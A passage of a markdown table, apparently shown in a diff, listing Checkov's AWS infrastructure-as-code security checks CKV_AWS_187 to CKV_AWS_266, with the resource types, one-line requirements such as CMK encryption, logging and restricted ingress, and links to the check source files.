[S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py) | -| 572 
| CKV_AWS_187 | resource | aws_sagemaker_domain | Ensure Sagemaker domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | -| 573 | CKV_AWS_189 | resource | aws_ebs_volume | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py) | -| 574 | CKV_AWS_190 | resource | aws_fsx_lustre_file_system | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK) | Terraform | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py) | -| 575 | CKV_AWS_191 | resource | aws_elasticache_replication_group | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py) | -| 576 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | -| 577 | CKV_AWS_192 | resource | aws_wafv2_web_acl | Ensure WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py) | -| 578 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | -| 579 | CKV_AWS_193 | resource | aws_appsync_graphql_api | Ensure AppSync has Logging enabled | Terraform | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py) | -| 580 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | -| 581 | CKV_AWS_194 | resource | aws_appsync_graphql_api | Ensure AppSync has Field-Level logs enabled | Terraform | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py) | -| 582 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 583 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 584 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | 
[GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 585 | CKV_AWS_195 | resource | aws_glue_crawler | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 586 | CKV_AWS_195 | resource | aws_glue_dev_endpoint | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 587 | CKV_AWS_195 | resource | aws_glue_job | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 588 | CKV_AWS_196 | resource | aws_elasticache_security_group | Ensure no aws_elasticache_security_group resources exist | Terraform | [ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py) | -| 589 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | -| 590 | CKV_AWS_197 | resource | aws_mq_broker | Ensure MQ Broker Audit logging is enabled | Terraform | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py) | -| 591 | CKV_AWS_198 | resource | aws_db_security_group | Ensure no aws_db_security_group resources exist | Terraform | 
[RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py) | -| 592 | CKV_AWS_199 | resource | aws_imagebuilder_distribution_configuration | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK) | Terraform | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py) | -| 593 | CKV_AWS_200 | resource | aws_imagebuilder_image_recipe | Ensure that Image Recipe EBS Disk are encrypted with CMK | Terraform | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py) | -| 594 | CKV_AWS_201 | resource | aws_memorydb_cluster | Ensure MemoryDB is encrypted at rest using KMS CMKs | Terraform | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py) | -| 595 | CKV_AWS_202 | resource | aws_memorydb_cluster | Ensure MemoryDB data is encrypted in transit | Terraform | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py) | -| 596 | CKV_AWS_203 | resource | aws_fsx_openzfs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py) | -| 597 | CKV_AWS_204 | resource | aws_ami | Ensure AMIs are encrypted using KMS CMKs | Terraform | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py) | -| 598 | CKV_AWS_205 | resource | 
aws_ami_launch_permission | Ensure to Limit AMI launch Permissions | Terraform | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py) | -| 599 | CKV_AWS_206 | resource | aws_api_gateway_domain_name | Ensure API Gateway Domain uses a modern security Policy | Terraform | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py) | -| 600 | CKV_AWS_207 | resource | aws_mq_broker | Ensure MQ Broker minor version updates are enabled | Terraform | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py) | -| 601 | CKV_AWS_208 | resource | aws_mq_broker | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | -| 602 | CKV_AWS_208 | resource | aws_mq_configuration | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | -| 603 | CKV_AWS_209 | resource | aws_mq_broker | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK) | Terraform | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py) | -| 604 | CKV_AWS_210 | resource | aws_batch_job_definition | Batch job does not define a privileged container | Terraform | [BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py) | -| 605 | CKV_AWS_211 | resource | aws_db_instance | Ensure RDS uses a modern CaCert | Terraform | 
[RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py) | -| 606 | CKV_AWS_212 | resource | aws_dms_replication_instance | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py) | -| 607 | CKV_AWS_213 | resource | aws_load_balancer_policy | Ensure ELB Policy uses only secure protocols | Terraform | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py) | -| 608 | CKV_AWS_214 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted at rest | Terraform | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py) | -| 609 | CKV_AWS_215 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted in transit | Terraform | [AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py) | -| 610 | CKV_AWS_216 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution is enabled | Terraform | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py) | -| 611 | CKV_AWS_217 | resource | aws_api_gateway_deployment | Ensure Create before destroy for API deployments | Terraform | [APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py) | -| 612 | CKV_AWS_218 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is 
using latest TLS | Terraform | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py) | -| 613 | CKV_AWS_219 | resource | aws_codepipeline | Ensure CodePipeline Artifact store is using a KMS CMK | Terraform | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py) | -| 614 | CKV_AWS_220 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using https | Terraform | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py) | -| 615 | CKV_AWS_221 | resource | aws_codeartifact_domain | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py) | -| 616 | CKV_AWS_222 | resource | aws_dms_replication_instance | Ensure DMS replication instance gets all minor upgrade automatically | Terraform | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py) | -| 617 | CKV_AWS_223 | resource | aws_ecs_cluster | Ensure ECS Cluster enables logging of ECS Exec | Terraform | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py) | -| 618 | CKV_AWS_224 | resource | aws_ecs_cluster | Ensure ECS Cluster logging uses CMK | Terraform | [ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py) | -| 619 | CKV_AWS_225 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting 
caching is enabled | Terraform | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py) | -| 620 | CKV_AWS_226 | resource | aws_db_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | -| 621 | CKV_AWS_226 | resource | aws_rds_cluster_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | -| 622 | CKV_AWS_227 | resource | aws_kms_key | Ensure KMS key is enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py) | -| 623 | CKV_AWS_228 | resource | aws_elasticsearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | -| 624 | CKV_AWS_228 | resource | aws_opensearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | -| 625 | CKV_AWS_229 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | -| 626 | CKV_AWS_229 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | 
[NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | -| 627 | CKV_AWS_230 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | -| 628 | CKV_AWS_230 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | -| 629 | CKV_AWS_231 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | -| 630 | CKV_AWS_231 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | -| 631 | CKV_AWS_232 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | -| 632 | CKV_AWS_232 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | -| 633 | CKV_AWS_233 | resource | aws_acm_certificate | Ensure Create before destroy for ACM certificates 
| Terraform | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py) | -| 634 | CKV_AWS_234 | resource | aws_acm_certificate | Verify logging preference for ACM certificates | Terraform | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py) | -| 635 | CKV_AWS_235 | resource | aws_ami_copy | Ensure that copied AMIs are encrypted | Terraform | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py) | -| 636 | CKV_AWS_236 | resource | aws_ami_copy | Ensure AMI copying uses a CMK | Terraform | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py) | -| 637 | CKV_AWS_237 | resource | aws_api_gateway_rest_api | Ensure Create before destroy for API Gateway | Terraform | [APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py) | -| 638 | CKV_AWS_238 | resource | aws_guardduty_detector | Ensure that GuardDuty detector is enabled | Terraform | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py) | -| 639 | CKV_AWS_239 | resource | aws_dax_cluster | Ensure DAX cluster endpoint is using TLS | Terraform | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py) | -| 640 | CKV_AWS_240 | resource | aws_kinesis_firehose_delivery_stream | Ensure Kinesis Firehose delivery stream is encrypted | Terraform | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py) | -| 641 | 
CKV_AWS_241 | resource | aws_kinesis_firehose_delivery_stream | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK | Terraform | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py) | -| 642 | CKV_AWS_242 | resource | aws_mwaa_environment | Ensure MWAA environment has scheduler logs enabled | Terraform | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py) | -| 643 | CKV_AWS_243 | resource | aws_mwaa_environment | Ensure MWAA environment has worker logs enabled | Terraform | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py) | -| 644 | CKV_AWS_244 | resource | aws_mwaa_environment | Ensure MWAA environment has webserver logs enabled | Terraform | [MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py) | -| 645 | CKV_AWS_245 | resource | aws_db_instance_automated_backups_replication | Ensure replicated backups are encrypted at rest using KMS CMKs | Terraform | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py) | -| 646 | CKV_AWS_246 | resource | aws_rds_cluster_activity_stream | Ensure RDS Cluster activity streams are encrypted using KMS CMKs | Terraform | [RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py) | -| 647 | CKV_AWS_247 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | 
[ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | -| 648 | CKV_AWS_247 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | -| 649 | CKV_AWS_248 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | -| 650 | CKV_AWS_248 | resource | aws_opensearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | -| 651 | CKV_AWS_249 | resource | aws_ecs_task_definition | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions | Terraform | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py) | -| 652 | CKV_AWS_250 | resource | aws_db_instance | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | -| 653 | CKV_AWS_250 | resource | aws_rds_cluster | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | 
[RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | -| 654 | CKV_AWS_251 | resource | aws_cloudtrail | Ensure CloudTrail logging is enabled | Terraform | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py) | -| 655 | CKV_AWS_252 | resource | aws_cloudtrail | Ensure CloudTrail defines an SNS Topic | Terraform | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py) | -| 656 | CKV_AWS_253 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted | Terraform | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py) | -| 657 | CKV_AWS_254 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted with Customer Managed Key | Terraform | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py) | -| 658 | CKV_AWS_255 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted | Terraform | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py) | -| 659 | CKV_AWS_256 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted using a Customer Managed Key | Terraform | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py) | -| 660 | CKV_AWS_257 | resource | aws_codecommit_approval_rule_template | Ensure CodeCommit branch changes have at 
least 2 approvals | Terraform | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py) | -| 661 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | -| 662 | CKV_AWS_258 | resource | aws_lambda_function_url | Ensure that Lambda function URLs AuthType is not None | Terraform | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py) | -| 663 | CKV_AWS_259 | resource | aws_cloudfront_response_headers_policy | Ensure CloudFront response header policy enforces Strict Transport Security | Terraform | [CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py) | -| 664 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 665 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 666 | CKV_AWS_260 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | 
[SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 667 | CKV_AWS_260 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 668 | CKV_AWS_260 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 669 | CKV_AWS_261 | resource | aws_alb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | -| 670 | CKV_AWS_261 | resource | aws_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | -| 671 | CKV_AWS_262 | resource | aws_kendra_index | Ensure Kendra index Server side encryption uses CMK | Terraform | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py) | -| 672 | CKV_AWS_263 | resource | aws_appflow_flow | Ensure AppFlow flow uses CMK | Terraform | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py) | -| 673 | CKV_AWS_264 | resource | aws_appflow_connector_profile | Ensure AppFlow connector profile uses CMK | Terraform | 
[AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py) |
-| 674 | CKV_AWS_265 | resource | aws_keyspaces_table | Ensure Keyspaces Table uses CMK | Terraform | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py) |
-| 675 | CKV_AWS_266 | resource | aws_db_snapshot_copy | Ensure DB Snapshot copy uses CMK | Terraform | [DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py) |
